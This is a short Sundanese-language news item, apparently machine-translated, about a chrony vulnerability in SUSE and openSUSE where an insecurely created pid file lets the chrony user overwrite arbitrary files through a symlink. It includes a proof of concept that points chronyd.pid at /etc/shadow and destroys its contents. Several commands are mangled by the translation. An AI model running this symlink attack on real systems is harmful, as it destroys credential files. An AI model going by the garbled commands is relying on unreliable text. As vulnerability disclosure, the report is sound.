В
Kerentanan disababkeun ku nyiptakeun file pid anu teu aman, anu didamel dina tahap nalika chrony henteu acan ngareset hak istimewa sareng dijalankeun salaku akar. Dina hal ieu, diréktori /run/chrony, dimana file pid ditulis, dijieun kalawan hak 0750 via systemd-tmpfiles atanapi nalika chronyd diluncurkeun dina asosiasi sareng pangguna sareng grup "chrony". Ku kituna, lamun boga aksés ka kroni pamaké, kasebut nyaéta dimungkinkeun pikeun ngaganti file pid /run/chrony/chronyd.pid kalawan tumbu simbolis. Tautan simbolis tiasa nunjuk kana file sistem naon waé anu bakal ditimpa nalika chronyd diluncurkeun.
root# systemctl eureun chronyd.service
root# sudo -u chrony /bin/bash
kroni$ cd /run/kroni
chrony$ ln -s /etc/shadow chronyd.pid
kroni$ kaluar
root# /usr/sbin/chronyd -n
^C
# tinimbang eusi /etc/shadow ID prosés chronyd bakal disimpen
root# ucing /etc/shadow
15287
Kerentanan
Masalah SUSE sareng openSUSE
sumber: opennet.ru